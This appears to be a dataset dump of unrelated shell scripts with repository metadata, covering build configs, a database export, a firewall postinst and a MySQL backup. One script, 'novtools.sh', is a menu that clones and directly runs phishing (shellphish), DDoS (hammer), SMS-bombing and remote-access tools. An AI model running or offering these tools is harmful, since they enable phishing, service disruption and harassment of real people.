# Input directory handed to isoplotter v1 for one FASTA file.
function v1_indir() {
    echo $outdir/$(basename $1)/input
}

# Output directory produced by isoplotter v1 for one FASTA file.
function v1_outdir() {
    echo $outdir/$(basename $1)/output
}

# Path of the extracted segment-bounds file for a FASTA and a version (1|2).
function bounds() {
    echo $outdir/bounds/$(basename $1).v$2
}
if ! $skip_analysis; then
#
# Perform analysis
#
rm -rf $outdir
mkdir -p $outdir
mkdir -p $outdir/bounds
for fasta in $fastas; do
mkdir -p $(v1_indir $fasta)
mkdir -p $(v1_outdir $fasta)
ln -s $fasta $(v1_indir $fasta)/
done
# version 1
(
for fasta in $fastas; do
version1/isoplotter pipeline $(v1_indir $fasta) $(v1_outdir $fasta)
cat $(v1_outdir $fasta)/IsoPlotter_ns_H.txt |
awk '{print $2 " " $3 " " $4}' > $(bounds $fasta 1)
done
)
# version 2
(
for fasta in $fastas; do
version2/isoplotter $fasta |
awk '{print $2 " " $3 " " $4}' > $(bounds $fasta 2)
done
)
fi
#
# Compare results
#
total_ndiffs=0
total_nlines=0
function report_diffs() {
local label=$1
local ndiffs=$2
local nlines=$3
echo "$label: Found differences in $ndiffs out of $nlines" $(python -c "print '(%.6f%%)' % (float($ndiffs)/$nlines*100)")
}
for fasta in $fastas; do
bounds1=$(bounds $fasta 1)
bounds2=$(bounds $fasta 2)
ndiffs=$(diff $bounds1 $bounds2 | grep ">" | wc -l)
nlines=$(cat $fasta | wc -l)
if (( $ndiffs != 0 )); then
report_diffs $(basename $fasta) $ndiffs $nlines
fi
total_ndiffs=$((total_ndiffs + ndiffs))
total_nlines=$((total_nlines + nlines))
done
report_diffs "TOTAL" $total_ndiffs $total_nlines
| true
|
c6372628701471a44a97e5c125537d2173a02fc1
|
Shell
|
fabriz/cpp_libs_build_scripts
|
/libs/tinyxml2/tinyxml2-8.0.0/config.sh
|
UTF-8
| 1,190
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#-----------------------------------------------------------------------------------------------------------------------
# Copyright (C) 2021 Fabrizio Maj
#
# This file is part of the cpp_libs_build_scripts project, which is distributed under the MIT license.
# Refer to the licenses of the managed libraries for conditions on their use and distribution.
# For details, see https://github.com/fabriz/cpp_libs_build_scripts
#-----------------------------------------------------------------------------------------------------------------------
# Configuration for tinyxml2 8.0.0 (library released 2020/03/02).
# Defines the FM_TINYXML2_* variables consumed by the build framework and
# exports them all at the end.

FM_TINYXML2_NAME="tinyxml2"
FM_TINYXML2_VERSION="8.0.0"
FM_TINYXML2_FULL_NAME="${FM_TINYXML2_NAME}-${FM_TINYXML2_VERSION}"
FM_TINYXML2_TARBALL_NAME="${FM_TINYXML2_FULL_NAME}.tar.gz"
FM_TINYXML2_TARBALL_DOWNLOAD_URL="https://github.com/leethomason/tinyxml2/tarball/${FM_TINYXML2_VERSION}"
FM_TINYXML2_UNTAR_DIR="leethomason-tinyxml2-*"
FM_TINYXML2_INSTALL_CHECK="include/tinyxml2.h"
FM_TINYXML2_HASH="e1a5a3c88882597fa1976b3fbbe4fe438540f03b44a9e205bfc5834cdb6725fa"
FM_TINYXML2_HASH_TYPE="SHA-256"

export FM_TINYXML2_NAME FM_TINYXML2_VERSION FM_TINYXML2_FULL_NAME \
       FM_TINYXML2_TARBALL_NAME FM_TINYXML2_TARBALL_DOWNLOAD_URL \
       FM_TINYXML2_UNTAR_DIR FM_TINYXML2_INSTALL_CHECK \
       FM_TINYXML2_HASH FM_TINYXML2_HASH_TYPE
| true
|
44647a6d023df89dba854bf48b21398fe53e8716
|
Shell
|
ttlin1/OsmLoader
|
/bin/db-export.sh
|
UTF-8
| 2,673
| 3.53125
| 4
|
[] |
no_license
|
# Export TriMet street/transit data from PostGIS as shapefiles and CSVs for
# three downstream consumers (INIT, HASTUS, Trapeze), zipping each bundle.
# Usage: db-export.sh [anything] -- any argument also rebuilds the
# init/hastus tables first via db-inithastus.sh.
# Helpers such as date_file are expected to come from db-common.sh -- TODO confirm.
. ~/OsmLoader/bin/db-common.sh

echo "START > > > > > "
date

# if a command line parameter is passed run the init & hastus builders, if not simple export the
# init and hastus tables to shapefile and csv
if [ $1 ]
then
    echo "****** REFRESH and RELOAD THE INIT / HASTUS DATA in POSTGIS ******"
    . ~/OsmLoader/bin/db-inithastus.sh
else
    echo
    echo "****** IMPORTANT: USING THE EXISTING INIT / HASTUS DATA and JUST EXPORTING THE .shp FILES!!!! *******"
    echo
fi

# config
# Tool locations and output directories; the ${VAR:=default} form keeps any
# value already set in the environment.
PGBIN=${PGBIN:="/home/geoserve/postgres/bin"}
PGSQL2SHP=${PGSQL2SHP:="$PGBIN/pgsql2shp"}
PSQL=${PSQL:="$PGBIN/psql"}
INIT_DIR=${INIT_DIR:="/home/otp/htdocs/init"}
HASTUS_DIR=${HASTUS_DIR:="/home/otp/htdocs/hastus"}
TRAPEZE_DIR=${TRAPEZE_DIR:="/home/otp/htdocs/trapeze"}

# do INIT
#
# Export the four files! (streets.shp, turnrestrictions.csv, citydirectory.shp, and streetdirectory.csv)
# All files should be in projection 4326 and INIT needs column names
# on shapefiles to be all upper case (thus no -k parameter)
echo "export INIT .shp files to $INIT_DIR"
$PGSQL2SHP -u geoserve -f $INIT_DIR/Streets.shp trimet osm.init_streets
$PGSQL2SHP -u geoserve -f $INIT_DIR/StreetDirectory.shp trimet osm.init_street_dir
$PGSQL2SHP -u geoserve -f $INIT_DIR/CityDirectory.shp trimet osm.init_city_dir

# turn.csv
# COPY ... TO runs server-side, so $tr_file must be writable by the
# postgres server process.
tr_file="$INIT_DIR/TurnRestrictions.csv"
tr_copy_sql="COPY (SELECT * FROM osm.init_turns) TO '$tr_file' CSV;"
echo "$tr_copy_sql"
$PSQL -U geoserve -d trimet -c "$tr_copy_sql"

# zip them up ...
cd $INIT_DIR
rm -f init.zip *~
zip init.zip *.* -x *.html *.log
date_file
cd -

# do HASTUS
#
# pgsql2shp -h maps7 -u tmpublic -P tmpublic -f C:\TEMP\hastus_streets.shp trimet osm.hastus_streets
# hastus_turns as a CSV for their turn restrictions.
# They don.t want the headers or the first column, so something like:
# COPY (SELECT from_segment, fseg_position, to_segment FROM osm.hastus_turns) TO '/home/bh/otp/osm-loader/hastus_turns.csv' CSV;
# -k keeps lower-case column names for the HASTUS export (unlike INIT).
echo "export HASTUS .shp files to $HASTUS_DIR"
$PGSQL2SHP -k -u geoserve -f $HASTUS_DIR/hastus_transit.shp trimet osm.hastus_transit

# turn .csv
tr_file="$HASTUS_DIR/hastus_turns.csv"
ht_copy_sql="COPY (SELECT from_segment, fseg_position, to_segment FROM osm.hastus_turns) TO '$tr_file' CSV;"
echo "$ht_copy_sql"
$PSQL -U geoserve -d trimet -c "$ht_copy_sql"

# zip them up ...
cd $HASTUS_DIR
rm -f hastus.zip *~
zip hastus.zip *.* -x *.html *.log
date_file
cd -

# do Trapeze
echo "Export TRAPEZE shapefile to $TRAPEZE_DIR"
$PGSQL2SHP -k -u geoserve -f $TRAPEZE_DIR/trapeze_streets.shp trimet osm.trapeze_streets

# zip..
cd $TRAPEZE_DIR
rm -f trapeze.zip *~
zip trapeze.zip *.* -x *.html *.log
date_file
cd -

date
echo "END < < < < < "
| true
|
fa017d1afbaf1dbf39c0972c2810a768133f4301
|
Shell
|
mdpiper/LANDIS
|
/setup
|
UTF-8
| 1,160
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Set up an environment for LANDIS-II on beach.
# Mark Piper (mark.piper@colorado.edu)
# Intended to be sourced: prepends the Mono and custom GDAL trees to the
# relevant search paths and defines a `landis` alias.

# Location of LANDIS-II install.
export LANDIS_DIR=$HOME/LANDIS-II

# Location of custom GDAL with Mono bindings for LANDIS-II.
GDAL_VERSION=1.8.1
# export GDAL_DIR=/usr/local/gdal-$GDAL_VERSION-gcc
export GDAL_DIR=$LANDIS_DIR/GDAL/$GDAL_VERSION

# Location of Mono install.
export MONO_DIR=/usr/local/mono

# Include Mono and custom GDAL in standard paths.
PATH=$MONO_DIR/bin:$GDAL_DIR/bin:$PATH

# prepend_path VALUE NAME: prepend VALUE to the colon-separated variable
# named NAME, omitting the trailing ':' when NAME is unset or empty.
# Replaces four copies of an unquoted `if [ $VAR ]` pattern that broke on
# values containing whitespace.
prepend_path() {
  local value=$1 name=$2
  if [ -n "${!name}" ]; then
    printf -v "$name" '%s' "$value:${!name}"
  else
    printf -v "$name" '%s' "$value"
  fi
}

prepend_path "$MONO_DIR/man" MANPATH
prepend_path "$MONO_DIR/lib:$GDAL_DIR/lib" LIBRARY_PATH
prepend_path "$MONO_DIR/include:$GDAL_DIR/include" CPATH
prepend_path "$MONO_DIR/lib:$GDAL_DIR/lib" LD_LIBRARY_PATH

export PATH MANPATH LIBRARY_PATH CPATH LD_LIBRARY_PATH

# Make a convenient alias to call LANDIS-II.
alias landis='mono $LANDIS_DIR/v6/bin/Landis.Console-6.0.exe'
| true
|
fdf38ee9c23466c84874b22ee304c0c66f803505
|
Shell
|
FauxFaux/debian-control
|
/s/shorewall/shorewall_5.2.1.4-1_all/postinst
|
UTF-8
| 2,130
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh -e
# Debian postinst for shorewall.
# On "configure": reset stale debconf flags, ensure the state directory
# exists, drop the obsolete shorewall-common postrm, and -- when startup is
# enabled and the config validates -- restart the firewall via systemd or
# sysvinit.

. /usr/share/debconf/confmodule

case "$1" in
    configure)
	db_reset shorewall/dont_restart || true
	db_reset shorewall/major_release || true
	db_go

	# State directory used by the shorewall compiler at runtime.
	if [ ! -d /var/lib/shorewall ]
	then
	    mkdir -p /var/lib/shorewall
	fi

	# The init script was moved from shorewall-common to shorewall, but
	# the shorewall-common postrm tries to remove the symlinks, which
	# cannot happen since /etc/init.d/shorewall now exists in the
	# shorewall package.
	if [ -f "/var/lib/dpkg/info/shorewall-common.postrm" ]
	then
	    rm -f /var/lib/dpkg/info/shorewall-common.postrm
	fi

	# /etc/default/shorewall may override $restart and provides $startup.
	restart="true"
	if [ -f "/etc/default/shorewall" ]
	then
	    . /etc/default/shorewall
	fi

	if [ "$restart" = "true" ] && [ "$startup" = "1" ]
	then
	    # Only (re)start if the compiled configuration is valid;
	    # otherwise surface a critical debconf note.
	    if /sbin/shorewall check
	    then
		# Prefer systemd when running under it and a unit exists.
		if [ -d "/run/systemd/system" ] && [ -f "/lib/systemd/system/shorewall.service" ]
		then
		    deb-systemd-helper enable shorewall.service
		    deb-systemd-invoke restart shorewall.service
		elif [ -f "/etc/init.d/shorewall" ]
		then
		    if [ -x "/usr/sbin/invoke-rc.d" ]
		    then
			invoke-rc.d shorewall restart
		    else
			/etc/init.d/shorewall restart
		    fi
		fi
	    else
		db_input critical shorewall/invalid_config || true
	    fi
	fi
	;;

    abort-upgrade|abort-remove|abort-deconfigure)
	;;

    *)
	echo "postinst called with unknown argument \`$1'" >&2
	exit 0
	;;
esac

# Automatically added by dh_installinit/11.5.4
if [ "$1" = "configure" ] || [ "$1" = "abort-upgrade" ] || [ "$1" = "abort-deconfigure" ] || [ "$1" = "abort-remove" ] ; then
	if [ -x "/etc/init.d/shorewall" ]; then
		update-rc.d shorewall defaults >/dev/null || exit 1
	fi
fi
# End automatically added section
| true
|
d913efb69dd114eeaa7e9e606254cef726510122
|
Shell
|
forast3r/dasshio
|
/.travis/build.sh
|
UTF-8
| 578
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build each changed Home Assistant add-on with the official builder image.
# Add-on directories are passed as arguments; $ARCHS may preselect target
# architectures, otherwise they come from the add-on's config.json.
set -e
set -x

archs="${ARCHS}"

for addon in "$@"; do
    # Rebuild when no commit range is given, or when the range touches files
    # under this add-on (README-only changes are ignored).
    if [ -z "${TRAVIS_COMMIT_RANGE}" ] || git diff --name-only "${TRAVIS_COMMIT_RANGE}" | grep -v README.md | grep -q -- "${addon}"; then
        if [ -z "$archs" ]; then
            # Default to the add-on's declared architectures (or all four),
            # rendered as "--armhf --amd64 ..." flags for the builder.
            archs=$(jq -r '.arch // ["armhf", "amd64", "aarch64", "i386"] | [.[] | "--" + .] | join(" ")' "${addon}/config.json")
        fi
        # $archs is intentionally unquoted: it must word-split into flags.
        docker run --rm --privileged -v ~/.docker:/root/.docker -v "$(pwd)/${addon}":/data homeassistant/amd64-builder ${archs} -t /data --no-cache
    else
        echo "No change in commit range ${TRAVIS_COMMIT_RANGE}"
    fi
done
| true
|
fa3f89e66195b598b6261c7e5c2ab399742cae7f
|
Shell
|
andre-setiawan9/novtools
|
/novtools.sh
|
UTF-8
| 3,598
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
#Version 1.1 (Beta)
# novtools: interactive Termux menu that installs/clones/runs a collection
# of pentest tools. Fixes vs. the original: valid shebang (was "#!bin/bash"),
# quoted menu choice via `case` (the unquoted `[ $no = 1 ]` chain errored on
# empty/multi-word input), "chmod +X" -> "chmod +x" in option 3, and option
# 12 now runs shellphish.sh (it chmod'ed shellphish.sh but ran "shell.sh").
clear
figlet NOV TOOLS | lolcat
echo "---------------------------------------------------
| # Author : NOV |
| # Email : trianov1506@gmail.com |
| # Instagram : @trianovwidyandaru |
| # Website : www.3anovproduction.wordpress.com |
| # Facebook : www.facebook.com/rianfarhanfaiz |
| # Version : V 1.1 (Beta) |
---------------------------------------------------" | lolcat
sleep 1
echo
echo "Selamat Datang, Nama Anda Siapa?"
read -p "Masukkan Nama Anda : " nama
echo
read -p "Hai $nama, Ingin Lanjut?" enter
sleep 0.3
echo "[#]> Tools Sudah Di Aktifkan" | lolcat
echo "[#]> Exit 00" | lolcat
sleep 1
echo ""
echo -e $b "1. Tools Nmap${enda}";
echo
echo -e $b "2. Tools Tools Project${enda}";
echo
echo -e $b "3. Tools Troll Project${enda}";
echo
echo -e $b "4. Tools SMS Bomb${enda}";
echo
echo -e $b "5. Tools Check CCTV${enda}";
echo
echo -e $b "6. Tools A-Rat${enda}";
echo
echo -e $b "7. Tools OSIF${enda}";
echo
echo -e $b "8. Tools Menampilkan Tombol${enda}";
echo
echo -e $b "9. Tools GPS Tracking${enda}";
echo
echo -e $b "10.Tools IPGeolocation${enda}";
echo
echo -e $b "11.Tools Lazymux${enda}";
echo
echo -e $b "12.Tools ShellPhish${enda}";
echo
echo -e $b "13.Tools Xshell${enda}";
echo
echo -e $b "14.Tools Websploit${enda}";
echo
echo -e $b "15.Tools Hammer (DDOS)${enda}";
echo
echo -e $b "16.Tools KK & KTP${enda}";
echo
echo -e $b "17.Tools Uninnstall Tools${enda}";
echo
read -p "Pilih Nomor : " no

# Exactly one branch runs per choice; unknown input falls through silently,
# matching the original if-chain.
case "$no" in
    1)
        pkg install nmap
        ;;
    2)
        git clone https://github.com/zlucifer/trap_project.git
        cd trap_project
        chmod +x trap.sh
        bash trap.sh
        ;;
    3)
        git clone https://github.com/zlucifer/troll_project.git
        cd troll_project
        chmod +x troll.sh
        bash troll.sh
        ;;
    4)
        git clone https://github.com/zlucifer/sms_bomb.git
        cd sms_bomb
        chmod +x bom.sh
        bash bom.sh
        ;;
    5)
        git clone https://github.com/zlucifer/all_seeing.git
        cd all_seeing
        chmod +x cctv.sh
        bash cctv.sh
        ;;
    6)
        git clone https://github.com/Xi4u7/A-Rat.git
        cd A-Rat
        chmod +x A-Rat.py
        python2 A-Rat.py
        ;;
    7)
        git clone https://github.com/CiKu370/OSIF.git
        cd OSIF
        pip install -r requirements.txt
        chmod +x osif.py
        python2 osif.py
        ;;
    8)
        git clone https://github.com/karjok/terkey.git
        cd terkey
        chmod +x terkey.py
        python terkey.py
        ;;
    9)
        git clone https://github.com/indosecid/gps_tracking.git
        cd gps_tracking
        chmod +x gps.php
        php gps.php
        ;;
    10)
        git clone https://github.com/maldevel/IPGeolocation.git
        cd IPGeolocation
        chmod +x ipgeolocation.py
        pip install -r requirements.txt
        python ipgeolocation.py -m
        python ipgeolocation.py -h
        python ipgeolocation.py -t
        ;;
    11)
        git clone https://github.com/Gameye98/Lazymux.git
        cd Lazymux
        chmod +x lazymux.py
        python2 lazymux.py
        ;;
    12)
        git clone https://github.com/thelinuxchoice/shellphish.git
        cd shellphish
        chmod +x shellphish.sh
        bash shellphish.sh
        ;;
    13)
        git clone https://github.com/Ubaii/Xshell.git
        cd Xshell
        chmod +x xshell.py
        python xshell.py
        ;;
    14)
        git clone https://github.com/websploit/websploit
        cd websploit
        chmod +x *
        pip2 install scapy
        python2 websploit
        ;;
    15)
        git clone https://github.com/cyweb/hammer.git
        cd hammer
        chmod +x hammer.py
        python hammer.py
        ;;
    16)
        git clone https://github.com/IndonesianSecurity/kkktp.git
        cd kkktp
        chmod +x kkktp.php
        php kkktp.php
        ;;
    17)
        pkg install mc
        ;;
esac
| true
|
59f4d11832afc5c6b469375ee505d319af7cae18
|
Shell
|
xlogerais/test-spring-boot
|
/start.bash
|
UTF-8
| 827
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch the Spring Boot test stack inside a detached tmux session:
# infrastructure windows first (eureka, config-server, admin-server), then
# the application windows once the infra has had time to come up.

SESSION_NAME=springboot
BASEDIR="$HOME/Work/Dev/test-spring-boot"
VERSION="0.0.1-SNAPSHOT"
DEBUG="--debug"

# spawn NAME SUBDIR JAR: open a tmux window running the given boot jar.
spawn() {
    local name=$1 subdir=$2 jar=$3
    tmux new-window -t "${SESSION_NAME}" -n "$name" -c "${BASEDIR}/$subdir" "java -jar $jar $DEBUG"
}

# Create tmux session
tmux new-session -s "${SESSION_NAME}" -d

# Start spring infra (eureka, admin-server, config-server)
spawn "eureka"        "base" "eureka/target/eureka-${VERSION}.jar"
spawn "config-server" "base" "config/target/config-${VERSION}.jar"
spawn "admin-server"  "base" "admin/target/admin-${VERSION}.jar"

# Give the infrastructure a head start before the apps register with it.
sleep 30

# Start applications
spawn "helloworld" "apps" "helloworld-api/target/helloworld-api-${VERSION}.jar"
| true
|
54390c3d62c16cd77b64c19a7ac86baf26edb832
|
Shell
|
gerdansantos/Admin_Rev3
|
/dockerfiles/ambari_node/ambari_node.sh
|
UTF-8
| 197
| 2.5625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Start an Ambari agent container (hwx/ambari_node) linked to node1.
# Usage: ambari_node.sh <node_name>
if [ $# -lt 1 ]
then
    echo "Usage: ambari_node.sh <node_name>" >&2
    exit 1   # non-zero so callers can detect the usage error (was plain `exit`)
fi

# NOTE(review): the single-dash long options (-dns, -name, -link) target the
# legacy docker CLI this project was written against; modern docker spells
# them --dns/--name/--link.
docker run -dns 127.0.0.1 -h "$1" -name "$1" -p 22 -link node1:node1 -p 8440 -p 8441 -i -t hwx/ambari_node
| true
|
9e86bb82ba68afed627867743f924e34020b1cfc
|
Shell
|
wzpdada/dada
|
/mysql.sh
|
UTF-8
| 3,923
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
# MySQL backup script: full dumps ("full") and binlog-based incremental
# backups ("increment"), with results compressed under $BACKUP_DIR and
# progress logged to $BACKUP_LOG.
#
# NOTE(review): the original file had been machine-translated -- shell
# keywords (set/if/then/for/do/done/case/esac/local) were replaced with
# Chinese words and stray spaces were inserted inside expansions, so it
# could not run. This is a reconstruction of the intended script; the
# Chinese log messages are preserved. Confirm paths/credentials before use.
set -e

USER="backup"
PASSWORD="backup"

# 数据库数据目录 (MySQL data directory and binlog index file)
DATA_DIR="/data/mysql"
BIN_INDEX=$DATA_DIR"/mysql-bin.index"

# 备份目录 (backup destination and log file)
BACKUP_DIR="/data/backup/mysql"
BACKUP_LOG="/var/log/mysql/backup.log"

DATE=$(date +"%Y%m%d")
TIME=$(date +"%Y%m%d%H")
LOG_TIME=$(date +"%Y-%m-%d %H:%M:%S")

# Binlog retention window and the incremental look-back interval.
DELETE_BINLOG_TIME="7 day"
INCREMENT_INTERVAL="3 hour"

note() {
    printf "[$LOG_TIME] 注意: $*\n" >> $BACKUP_LOG
}

warning() {
    printf "[$LOG_TIME] 警告: $*\n" >> $BACKUP_LOG
}

error() {
    printf "[$LOG_TIME] 错误: $*\n" >> $BACKUP_LOG
    exit 1
}

# Dump every database directory under $DATA_DIR with mysqldump, then
# compress the dump and remove the raw .sql file.
full_backup() {
    local dbs=$(ls -l $DATA_DIR | grep "^d" | awk -F" " '{print $9}')
    for db in $dbs
    do
        local backup_dir=$BACKUP_DIR"/full/"$db
        local fname=$db"."$DATE
        local backup_file=$backup_dir"/"$fname".sql"
        if [ ! -d $backup_dir ]
        then
            mkdir -p $backup_dir || { error "创建数据库$db全量备份目录$backup_dir失败"; continue; }
            note "数据库$db全量备份目录$backup_dir 不存在,创建完成"
        fi
        note "完全备份 $db start..."
        mysqldump --user=${USER} --password=${PASSWORD} --flush-logs --skip-lock-tables --quick $db > $backup_file || { warning "数据库$db备份失败"; continue; }
        cd $backup_dir
        tar -cPzf $fname".tar.gz" $fname".sql"
        rm -f $backup_file
        chown -fR mysql:mysql $backup_dir
        note "数据库$db备份成功"
        note "完全备份 $db end。"
    done
}

# Purge binlogs older than the retention window, then replay the remaining
# binlogs per database into an incremental .sql file and compress it.
increment_backup() {
    local StartTime=$(date -d "$INCREMENT_INTERVAL ago" +"%Y-%m-%d %H:%M:%S")
    local DELETE_BINLOG_END_TIME=$(date -d "$DELETE_BINLOG_TIME ago" +"%Y-%m-%d %H:%M:%S")
    local dbs=$(ls -l $DATA_DIR | grep "^d" | awk -F" " '{print $9}')

    mysql -u$USER -p$PASSWORD -e "purge master logs before '$DELETE_BINLOG_END_TIME'" && note "删除 $DELETE_BINLOG_TIME 之前日志"

    # Binlog file names, taken from the index (paths are "dir/file").
    binlogs=$(cat $BIN_INDEX | awk -F"/" '{print $2}')
    for i in $binlogs
    do
        for db in $dbs
        do
            local backup_dir=$BACKUP_DIR"/increment/"$db
            local fname=$db"."$TIME
            local backup_file=$backup_dir"/"$fname".sql"
            if [ ! -d $backup_dir ]
            then
                mkdir -p $backup_dir || { error "创建数据库$db增量备份目录$backup_dir失败"; continue; }
                note "数据库$db增量备份目录$backup_dir 不存在,创建完成"
            fi
            note "增量备份 $db 时间 $StartTime start..."
            mysqlbinlog -d $db --start-datetime="$StartTime" $DATA_DIR/$i >> $backup_file || { warning "数据库$db备份失败"; continue; }
            note "增量备份 $db end。"
        done
    done

    # Compress each accumulated incremental dump.
    for db in $dbs
    do
        local backup_dir=$BACKUP_DIR"/increment/"$db
        local fname=$db"."$TIME
        local backup_file=$backup_dir"/"$fname".sql"
        cd $backup_dir
        tar -cPzf $fname".tar.gz" $fname".sql"
        rm -f $backup_file
        note "数据库$db备份成功"
    done
}

case "$1" in
    full)
        full_backup
        ;;
    increment)
        increment_backup
        ;;
    *)
        exit 2
        ;;
esac
| true
|
82a2449a2b04bcabb7b181f9fd0a4f4f6183c8fe
|
Shell
|
carbonblack/cb-event-forwarder
|
/run-event-forwarder.sh
|
UTF-8
| 2,297
| 4.09375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Control script for the EDR Event Forwarder docker container:
#   run-event-forwarder.sh start|stop|status

LABEL=edreventforwarder
IMAGE=eventforwarder/centos7:latest

CONFIG_DIR_EXTERNAL=/etc/cb/integrations/event-forwarder
CONFIG_DIR=/etc/cb/integrations/event-forwarder
LOG_DIR_EXTERNAL=/var/log/cb/integrations/cb-event-forwarder
LOG_DIR=/var/log/cb/integrations/cb-event-forwarder
# Bind-mount the host config and log directories into the container.
MOUNT_POINTS="--mount type=bind,source=$CONFIG_DIR_EXTERNAL,target=$CONFIG_DIR --mount type=bind,source=$LOG_DIR_EXTERNAL,target=$LOG_DIR"
SERVICE_START=/usr/share/cb/integrations/event-forwarder/cb-event-forwarder

# Print whether the forwarder container is running, stopped, or absent.
get_container_status () {
    CONTAINER_NAME=$(docker ps | grep $LABEL | head -n1 | awk '{print $1}')
    if [ "${#CONTAINER_NAME}" -gt 0 ]; then
        CONTAINER_RUNNING=true
        echo "EDR Event Forwarder Container status: Running"
        echo "EDR Event Forwarder Container identifier: ${CONTAINER_NAME}"
    else
        # run ps with -a switch to see if stopped or non-existent
        # Bug fix: the original ran plain `docker ps` here, so a stopped
        # container was always reported as "No running container".
        STOPPED_NAME=$(docker ps -a | grep $LABEL | head -n1 | awk '{print $1}')
        if [ "${#STOPPED_NAME}" -gt 0 ]; then
            echo "EDR Event Forwarder Container status: Stopped "
        else
            echo "EDR Event Forwarder Container status: No running container"
        fi
        CONTAINER_RUNNING=false
    fi
}

STATUS_COMMAND=get_container_status
SHUTDOWN_COMMAND=stop_and_remove_container

stop_and_remove_container() {
    docker stop $LABEL > /dev/null
    docker rm $LABEL > /dev/null
}

STARTUP_COMMAND="docker run -d --restart unless-stopped $MOUNT_POINTS --name $LABEL $IMAGE $SERVICE_START"

print_help() {
    echo "Usage: edr-eventforwarder-run COMMAND [options]"
    echo
    echo "Options:"
    echo " -h, --help Print this help message."
    echo
    echo "COMMANDs:"
    echo " start Start the connector"
    echo " stop Stop the connector"
    echo " status Show the connector status"
    exit 2
}

PARSED=$(getopt -n run -o o: --long osversion:,help -- "$@")
if [ "${?}" != "0" ]; then
    print_help
fi

if [[ "${1}" == "" ]]; then
    echo "COMMAND required"; print_help
fi

# Case-insensitive match on the verb, then dispatch to the command strings.
if [[ "${1^^}" =~ ^(START|STOP|STATUS)$ ]]; then
    echo "EDR Event Forwarder: running command ${1}..."
    case "${1^^}" in
        START) $STARTUP_COMMAND ;;
        STOP) $SHUTDOWN_COMMAND ;;
        STATUS) $STATUS_COMMAND ;;
    esac
else
    echo "run: invalid command '${1}'"; print_help
fi
| true
|
36e238af53c7a1bba3177f3dba6da34af9abbcbf
|
Shell
|
dmcgrady/zsh
|
/plugins/zsh-os/bin/tasks
|
UTF-8
| 2,071
| 3.796875
| 4
|
[] |
no_license
|
#!/usr/bin/env zsh
# Command-line front-end for vim-tasks: greps the todo file
# ($HOME/notes/now.todo) and prints filtered task lists.

typeset -A Module Commands

# ------------------------------------------------------
# dnet
# ------------------------------------------------------

Module=(
Name 'tasks'
About 'Interact with vim-tasks from a command-line'
Author 'Dan McGrady <dan@dmix.ca>'
Repo 'https://github.com/dmix/bin'
)

# Help -------------------------------------------------
Help() { cat << EOF
Usage:
tasks <all|next|project> <filter>
all = [optional] list all tasks
next = [default] show next 3 tasks
project = [optional] filter tasks by project

Example:
$ tasks OR tasks next

> Listing next 3 tasks todo...
>
> 1. Take out trash @home
> 2. Fix bed @home
> 3. Call peter @work

$ tasks project home

> Listing tasks for project @home...
>
> 1. Take out trash @home
> 2. Fix bed @home
EOF
exit
}

# Options -------------------------------------------------

File="$HOME/notes/now.todo"
Action=$1 # list, next, etc

# Sub-command name -> handler function (zsh associative array).
Commands=(
'all' tasks-all
'next' tasks-next
'now' tasks-now
'project' tasks-project
'done' tasks-done
)

# program -------------------------------------------------

# List every open task (pending boxes "☐" and section headers), filtering
# out completed "✔" lines.
# NOTE(review): the '✔"' alternative in the egrep pattern looks like a
# stray quote -- confirm before cleaning up.
tasks-all() {
echo "vim-tasks: Listing all tasks... \n"
egrep '☐|:|✔"' $File | grep -v "✔"
echo "" && exit
}

# Show the next 3 pending tasks in the HIGH-priority section.
tasks-now() {
echo "vim-tasks: Listing next 3x high priority tasks...\n"
grep -A 3 "HIGH:" $File | grep "☐"
echo "" && exit
}

# Default action.
# NOTE(review): body is identical to tasks-all, so the "next 3 tasks"
# limit promised by Help is not implemented here -- confirm intent.
tasks-next() {
echo "vim-tasks: Listing next tasks...\n"
egrep '☐|:|✔"' $File | grep -v "✔"
echo "" && exit
}

# List tasks tagged with @<filter> ($1).
tasks-project() {
local _filter=$1
echo "vim-tasks: Listing tasks for project @$_filter... \n"
grep "@$_filter" $File
echo "" && exit
}

# List completed ("✔") tasks.
tasks-done() {
echo "vim-tasks: Listing completed tasks... \n"
grep '✔' $File
echo "" && exit
}

# Run Program
# ------------------------------------------------------

[ "$Action" = "-h" ] && Help

# Disable Logger

[ ! $Action ] && Action="next"

# Dispatch: look up the handler for $Action and pass along all arguments.
$Commands[$Action] $@
| true
|
7a71a6a72525814e1f0bbb67ebdac8065197bfeb
|
Shell
|
milksteak-project/steaks
|
/packages/libnl/libnl.sh
|
UTF-8
| 1,130
| 4
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Fetch, build and install libnl into $HOME/usr, then clean up the sources.

TMPDIR="$HOME/usr/tmp"

PACKAGE="libnl"
VERSION="master" #2.0
SOURCE="${PACKAGE}-${VERSION}"
ZIP="${SOURCE}.zip"
LINK="https://github.com/sigma-1/${PACKAGE}/archive/${VERSION}.zip"
DEPS="bison"

# -- Install dependencies
function install_dependencies() {
    brew install $DEPS
}
echo -e ">>>>> Installing dependencies..."
install_dependencies &> /dev/null

# -- Fetch source
function fetch_package() {
    # -- Fetch source ZIP
    # Bug fix: the archive is saved to $TMPDIR/$ZIP, so the cache check must
    # look there too (the original tested ./$ZIP and always re-downloaded).
    test -e "$TMPDIR/$ZIP" || wget -O "$TMPDIR/$ZIP" "$LINK" -q --show-progress
    # -- Unpack ZIP
    cd "$TMPDIR" ; unzip -o "$ZIP" | pv -l >/dev/null
}
echo -e ">>>>> Fetching sources..."
fetch_package &> /dev/null

# -- Install package
function install_package() {
    cd "${TMPDIR}/${SOURCE}"
    ./autogen.sh
    ./configure --prefix="$HOME/usr"
    make ; make install PREFIX="$HOME/usr"
    mkdir -p "$HOME/usr/include"
    cp -r "${TMPDIR}/${SOURCE}/include/linux" "$HOME/usr/include"
}
echo -e ">>>>> Installing package..."
install_package &> /dev/null

# -- Cleanup
function cleanup() {
    cd "$TMPDIR"
    rm "$ZIP"
    rm -rf "$SOURCE"
}
echo -e ">>>>> Cleaning up..."
cleanup &> /dev/null

echo -e "$PACKAGE has been successfully installed!"
| true
|
